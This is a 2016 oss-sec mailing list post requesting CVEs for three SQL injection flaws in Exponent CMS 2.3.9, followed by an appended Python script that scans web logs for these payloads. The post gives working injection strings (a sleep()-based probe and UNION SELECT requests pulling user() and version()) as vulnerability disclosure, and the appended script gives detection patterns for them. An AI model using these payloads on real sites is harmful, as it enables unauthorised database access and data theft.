oss-sec mailing list archives

CVE request: Exponent CMS 2.3.9 SQL injection vulnerabilities


From: felix k3y <felixk3y () gmail com>
Date: Sun, 18 Sep 2016 12:09:04 +0800

Hi, I reported the following SQL Injection vulnerabilities to the
ExponentCMS team on Sep 13, 2016:

1)
https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/addressbook/controllers/addressController.php#L166-L175

2)
https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/blog/controllers/blogController.php#L192-L195

3)
https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/core/controllers/expCommentController.php#L129-L134


/index.php?controller=address&action=activate_address
In the first case, you can send "id=1 and if(1,sleep(1),0)%23" in the
POST data of an HTTP request;

/index.php?controller=blog&action=show&title=xx' union select
1,user(),3,4,5,6,7,8,9,0,11,2,3,4,5,6,7,8,9,0%23
In the second, you can send "title=xx' union select
1,user(),3,4,5,6,7,8,9,0,11,2,3,4,5,6,7,8,9,0%23" in the GET data of an
HTTP request;

/index.php?controller=expComment&action=showComments&content_id=11%20union%20select%201,2,3,4,version(),6,7,8,9,10,11--%20s&config[disable_nested_comments]=1
In the last one, you can send
"content_id=11%20union%20select%201,2,3,4,version(),6,7,8,9,10,11--%20s" in
the GET data of an HTTP request.



And now, all SQL injection vulnerabilities have been fixed.

https://exponentcms.lighthouseapp.com/projects/61783/changesets/e916702a91a6342bbab483a2be2ba2f11dca3aa3
https://github.com/exponentcms/exponent-cms/commit/e916702a91a6342bbab483a2be2ba2f11dca3aa3

I would like to request CVEs for those issues (if not done so).

thx.
--------------------------------------
felixk3y#gmail.com
penghua#silence.com.cn
PKAV Team
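For defenders checking whether an Exponent install saw these requests before the fix was applied, here is an added example (not part of the post above) that scans web-server log lines for the three payload shapes the report describes: a UNION SELECT in a query parameter, a time-based probe via sleep() in POST data, and a trailing SQL comment. The log lines are constructed, and the log format assumes an extra trailing quoted field holding the POST body.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not taken from the report): common-log
# format plus an assumed trailing quoted field carrying the POST body.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Sep/2016:12:09:04 +0800] "GET /index.php?controller=blog&action=show&title=xx'%20union%20select%201,user(),3,4,5,6,7,8,9,0,11,2,3,4,5,6,7,8,9,0%23 HTTP/1.1" 200 512
10.0.0.6 - - [18/Sep/2016:12:09:05 +0800] "GET /index.php?controller=expComment&action=showComments&content_id=11%20union%20select%201,2,3,4,version(),6,7,8,9,10,11--%20s&config[disable_nested_comments]=1 HTTP/1.1" 200 812
10.0.0.7 - - [18/Sep/2016:12:09:06 +0800] "POST /index.php?controller=address&action=activate_address HTTP/1.1" 200 120 "id=1%20and%20if(1,sleep(1),0)%23"
10.0.0.8 - - [18/Sep/2016:12:10:00 +0800] "GET /index.php?controller=blog&action=show&title=hello-world HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'\d+ \d+(?: "(?P<body>[^"]*)")?$'
)

# The three payload shapes in the report: UNION-based extraction, a time-based
# blind probe, and a trailing SQL comment that discards the rest of the query.
PATTERNS = {
    "union_select": re.compile(r"\bunion\b.{0,24}\bselect\b", re.I),
    "time_delay": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "comment_terminator": re.compile(r"#|--\s"),
}

def suspicious_params(method, target, body):
    """Yield (param, matched_pattern_names) over percent-decoded values."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if method == "POST" and body:
        for key, vals in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(vals)
    for key, vals in params.items():
        for val in vals:  # parse_qs has already decoded %20, %23, etc.
            hits = sorted(n for n, p in PATTERNS.items() if p.search(val))
            if hits:
                yield key, hits

def scan_log(text):
    """Return one finding per (request, parameter) that matches a pattern."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        controller = parse_qs(urlsplit(m["target"]).query).get("controller", ["?"])[0]
        for param, hits in suspicious_params(m["method"], m["target"], m["body"]):
            findings.append({"ip": m["ip"], "controller": controller,
                             "param": param, "hits": hits})
    return findings
```

Running `scan_log(SAMPLE_LOG)` flags the three injection requests by controller and parameter and leaves the ordinary blog request alone; matching on decoded values matters because the payloads arrive percent-encoded.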
